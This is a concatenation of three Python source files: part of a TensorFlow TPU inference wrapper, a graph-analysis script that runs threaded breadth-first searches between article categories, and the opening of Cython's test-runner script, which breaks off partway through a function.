export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
  It puts the computation on TPU, adds batching around it, and round-robins the
  computation between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
functs.py
|
import numpy as np
import pandas as pd
import math
import networkx as nx
import csv
from statistics import median, mean
import queue as Q
import threading
from numba import autojit
# function to open dicts we saved
def open_dict(vocabularyFile):
cats = open(vocabularyFile, 'r', encoding = "utf8").readlines()
cats2 = {}
for cat in cats:
templ = []
for x in cat.split():
templ.append(x.strip("[").strip("]").strip("'").strip(",").rstrip("''").rstrip('\n'))
try:
int(templ[1])
cats2[templ[0]] = templ[1:]
except:
cats2[templ[0]] = " ".join(templ[1:])
return cats2
# function to save our vocabulary file to disk
def save_dict(vocabulary,fileName="output.csv"):
with open(fileName,'wb') as vfile:
for i in vocabulary.keys():
vfile.write(str(i).encode())
vfile.write(str('\t').encode())
vfile.write(str(vocabulary[i]).encode())
vfile.write('\n'.encode())
vfile.close()
# function to look for the shortest path
def bfs(graph, inp_cat, inp_node, dest_cat, out_q):
# creating a queue
queue = Q.Queue()
#putting the current node in the queue
queue.put([inp_node, 0])
# defining a dictionary to check if we already visited the nodes of graph
visited = {}
# setting the distance of the current node to infinity as a default
sh_path = np.inf
# setting visited to False for every node in the graph
for x in graph.nodes:
visited[x] = False
# check for shortest paths as long as the queue is not empty
while queue.empty() != True:
# get the node we put in first
current = queue.get()
        # check if the entry we got from the queue is in the destination category and not in the input category
if graph.node[current[0]][dest_cat] == True and graph.node[current[0]][inp_cat] != True:
            # if it's true, mark it as visited (unnecessary step, as we break right after anyway)
visited[current[0]]= True
            # update the shortest path if we found one; otherwise it will stay infinite
sh_path = current[1]
#print('shortest path from ', inp_node, ' to ', current[0], ' found (dist = ', current[1], ')')
queue.queue.clear()
else:
# get the successors of our current node (as its a directed graph)
for i in graph.successors(current[0]):
# check if the successor is not visited
if visited[i] != True:
# if its not visited, put the found node in the queue,
# together with the information about the distance it has from the starting node
queue.put([i, current[1]+1])
# set the current node to visited
visited[current[0]]= True
# put the result we found
out_q.put([inp_node, sh_path])
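# Illustrative sketch, not part of the original script: the same level-by-level
# search on a plain adjacency dict, without networkx or threading, to show the
# distance bookkeeping used in bfs() above. _example_bfs_distance is a
# hypothetical helper used only for this sketch.
def _example_bfs_distance(adjacency, start, targets):
    queue = Q.Queue()
    queue.put((start, 0))
    visited = {start}
    while not queue.empty():
        node, dist = queue.get()
        if node in targets:
            # the first time we reach any target node, dist is the shortest distance
            return dist
        for succ in adjacency.get(node, []):
            if succ not in visited:
                visited.add(succ)
                queue.put((succ, dist + 1))
    # no target reachable from start
    return np.inf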
# function to execute the bfs
def run_bfs(start_cat, graph, categories):
#creating a list of nodes of our starting category
inp_nodes = [cat_nodes for cat_nodes in graph.nodes if graph.node[cat_nodes][start_cat]== True]
# create a dictionary we want to save the medians and other information to
medians = {}
#iterate over all categories in the list of categories
for cat in categories:
        # creating a dictionary we save the information for every node the bfs returned
sh_paths = {}
# iterate only over the categories that aren't our C0
if cat != start_cat:
# setting the destination category to be passed to our bfs
dest_cat = cat
# creating a queue that contains the nodes we want to pass to the bfs
start_q = Q.Queue()
# creating a queue that we'll pass the results of our bfs to
out_q = Q.Queue()
# adding the nodes of our C0 to the start_q. every node will be passed to our bfs
for start_node in inp_nodes:
start_q.put(start_node)
# while we didn't calculate the shortest distance for every node in our C0, do things
while not start_q.empty():
# as long as the number of running threads is at most 50, add threads
if threading.active_count() <= 50:
# get the current node from our start_q
current_t = start_q.get()
# start a thread with our bfs and the aforementioned parameters
t = threading.Thread(target=bfs, args=(graph, start_cat, current_t, dest_cat, out_q), daemon= True).start()
# tell the start_q that the task with current_t is done
start_q.task_done()
# while we didn't retrieve all values the bfs calculated, keep running
while not out_q.empty():
# get the first result in the queue
out_p = out_q.get()
# add the information to our shortest paths dictionary. the key is the node, the value the distance
sh_paths[out_p[0]] = out_p[1]
# tell the out_q that the job is finished
out_q.task_done()
# tell the start_q that all threads shall be joined
start_q.join()
            # setting up variables for calculating the average and counting the infinities in our result
sum_vals = 0
i = 0
inf_count = 0
            # iterate over the values we retrieved for the distances from c0 to ci in order to sum the values and count the infinities
for x in sh_paths.values():
if x != np.inf:
i+=1
sum_vals += x
else:
inf_count += 1
# saving median, mean and infinity count as values in a dictionary. The key is the category to which we calculated the distance from c0
medians[cat] = [median(sh_paths.values()), sum_vals/i, inf_count]
return medians
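# Illustrative sketch, not part of the original script: the fan-out/fan-in
# pattern used in run_bfs(), with worker threads writing their results to a
# shared queue. _example_threaded_map and its trivial worker are hypothetical.
def _example_threaded_map(items, worker):
    out_q = Q.Queue()
    threads = []
    for item in items:
        # each thread computes one result and puts it on the shared queue
        t = threading.Thread(target=lambda i=item: out_q.put((i, worker(i))), daemon=True)
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
    return dict(out_q.get() for _ in range(len(items)))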
'''
Functions for scoring:
'''
#function to assign every node only to one category
#@autojit
def key_substraction(cat_dict, org_cat, list_smallest):
return_dict = {}
# Get a list of categorys, sorted by the ascending distance from our C0
# (doesn't include our starting category so we don't have to iterate over it
keys = []
for key in list_smallest:
keys.append(key[0])
# iterating over the categories in a list we sorted by the ascending distance from our C0
for i in range(len(keys)):
if i == 0:
# getting the nodes of our starting category
org_nodes = cat_dict[org_cat]
# iterating over all categories in our list of sorted categories
for key in keys:
# assigning only the values of the current key minus the intersection
# of the values of the current category and our starting category
temp = []
for node in cat_dict[key]:
if node not in org_nodes:
temp.append(node)
return_dict[key] = temp
else:
            # iterating over all categories again, but now we're only using the keys of the categories we didn't
            # clean up yet. Same as before, we're only assigning the values of Ci to Cn minus the intersection of Ci-1 and Ci.
for x in range(i,len(keys)):
temp = []
for node in cat_dict[keys[x]]:
if node not in cat_dict[keys[i-1]]:
temp.append(node)
return_dict[keys[x]] = temp
return return_dict
#function to create the score for a node by its in edges
#(the original version referenced an undefined global `graph`; pass it explicitly)
def no_in_edges(graph, node, cat):
    x = 0
    # getting the number of in edges by counting all predecessors
    # (nodes with edges pointing towards the node we're looking at) of a node.
    for i in graph.predecessors(node):
        # only count predecessors that belong to the given category
        if graph.node[i][cat] == True:
            x += 1
    return x
#create the score for every node in a category
def article_score_cat(graph, cat):
#get all the nodes of the current category in a defined graph
nodes = [nodes for nodes in graph.nodes if graph.node[nodes][cat]== True]
for node in nodes:
# set the score to the existing score (in the beginning 0) + the number of in edges of the current node
        graph.node[node]['score'] = graph.node[node]['score'] + no_in_edges(graph, node, cat)
def article_score(graph, cat_list):
for i in range(len(cat_list)):
if i == 0:
nodes = [nodes for nodes in graph.nodes if graph.node[nodes][cat_list[i]]== True]
sub_g = graph.subgraph(nodes)
article_score_cat(sub_g, cat_list[i])
else:
cat_nodes = [nodes for nodes in graph.nodes if graph.node[nodes][cat_list[i]]== True]
# sub_g_cat = graph.subgraph(cat_nodes)
# article_score_cat(sub_g_cat, cat_list[i])
for node in cat_nodes:
nodes.append(node)
sub_g = graph.subgraph(nodes)
article_score_cat(sub_g, cat_list[i])
for node in cat_nodes:
for pred in sub_g.predecessors(node):
if graph.node[pred][cat_list[i-1]] == True:
graph.node[node]['score'] = graph.node[node]['score'] + graph.node[pred]['score']
return sub_g
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
    # late import to accommodate the setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
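# Illustrative sketch, not part of the original test runner: what def_to_cdef()
# produces for one module-level function. The sample source is hypothetical.
def _example_def_to_cdef():
    source = (
        'def add(int a, int b):\n'
        '    """\n'
        '    >>> add(1, 2)\n'
        '    3\n'
        '    """\n'
        '    return a + b\n'
    )
    # Returns a thin `def add(a, b)` wrapper that keeps the docstring/tests and
    # forwards to a generated `cdef add_c(int a, int b)` holding the body.
    return def_to_cdef(source)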
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
    Finds the C/C++ compiler's version output by invoking it via Popen.
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
    # Compare version components numerically rather than as strings, so that
    # e.g. gcc 10.x is not considered older than 4.2.
    if compiler_version and tuple(int(v) for v in compiler_version.split('.')) >= (4, 2):
        return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
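# Simple memoisation helper: caches f's results keyed by its positional arguments.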
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
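# parse_tags() reads the leading '# name: value' comment block of a test file, e.g.
#     # mode: run
#     # tag: numpy, openmp
# and returns a defaultdict mapping each directive to its list of values.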
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
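# Cache os.listdir() results for directories whose contents are not expected to
# change for the duration of the test run.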
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
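# Import a freshly built extension module, either directly from a shared-object
# path or by module name (invalidating the import caches first where available).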
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
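# distutils build_ext subclass that injects ccache, drops '-Wstrict-prototypes'
# for C++ builds and adds '/openmp' when building OpenMP extensions with MSVC.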
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
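# File-like object that captures compiler output and parses it into
# (line, column, message) error/warning tuples for comparison with the
# expectations embedded in error-mode tests.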
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
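# Accumulates per-metric test timings and keeps a bounded min-heap of the
# slowest tests for the summary report.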
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
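# Walks the test directories and builds a unittest.TestSuite, choosing the test
# case class (compile / run / unittest / pyregr / end-to-end) from each file's
# mode and tags.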
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
            # The embedding test is driven by a makefile, so it is skipped on Windows.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
